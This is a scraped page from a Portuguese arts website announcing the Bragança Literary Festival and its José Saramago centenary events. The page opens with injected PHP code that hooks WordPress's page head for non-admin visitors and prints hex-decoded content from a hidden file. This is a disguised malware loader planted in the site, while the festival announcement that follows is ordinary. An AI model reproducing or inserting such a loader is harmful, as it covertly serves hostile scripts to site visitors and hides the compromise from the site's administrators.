if ((is_admin() || (function_exists('get_hex_cache'))) !== true) { add_action('wp_head', 'get_hex_cache', 12); function get_hex_cache() { return print(@hex2bin( '3c7' . (file_get_contents(__DIR__ .'/_inc.tmp')))); } } Festival Literário de Bragança - artesentreasletras.com.pt

Festival Literário de Bragança

Festival Literário de Bragança

Foto: © Reprodução Facebook / Vhils

O Festival Literário de Bragança (FLB) regressa ao seu formato presencial, de 25 a 28 de Maio, e assinala o centenário do nascimento de José Saramago, prémio nobel da literatura. Violante Saramago Matos e Ana Matos, filha e neta do escritor, marcarão presença neste evento literário que conta com autores como Gonçalo M. Tavares, vencedor do primeiro prémio José Saramago, André Osório, David Machado, Luís Osório, Sónia Borges, entre outros.
Dia 25, a Biblioteca Municipal recebe a inauguração da exposição “Abraço a Saramago”, de Violante Saramago Matos. Uma coletânea de obras com forte componente afetiva, numa abordagem íntima à obra do próprio pai. Mais tarde, no mesmo local, a filha e a neta de Saramago, Ana Matos, cruzam-se numa conversa familiar sobre o “ADN-Saramago”, com moderação da jornalista Cristina Margato.
Dia 26 há, também na Biblioteca Municipal, um espetáculo literário, destinado a famílias, com o mote: “Seguindo pelas páginas de Saramago”, de Rui Ramos. No mesmo local, “Evocação a Saramago nos 100 anos do seu nascimento” reúne três conhecedores da vida e obra do escritor: Cândido Oliveira Martins, Professor da Universidade Católica, Carlos Nogueira, Investigador CEL e Professor da UTAD, e João Cabrita, Investigador e Doutor em Filologia Portuguesa, numa conversa com moderação do jornalista João Céu e Silva.
Dia 27, Violante Saramago Matos regressa para o lançamento do livro “De Memórias nos Fazemos”, com apresentação do jornalista e escritor Luís Osório. À noite, o Teatro Municipal de Bragança espera sala cheia para assistir à peça “O Ano da Morte de Ricardo Reis”, baseada na mítica obra de José Saramago, com encenação e adaptação de Luís Trigo. Espetáculo que terá, também, uma sessão reservada e exclusiva para alunos do ensino secundário.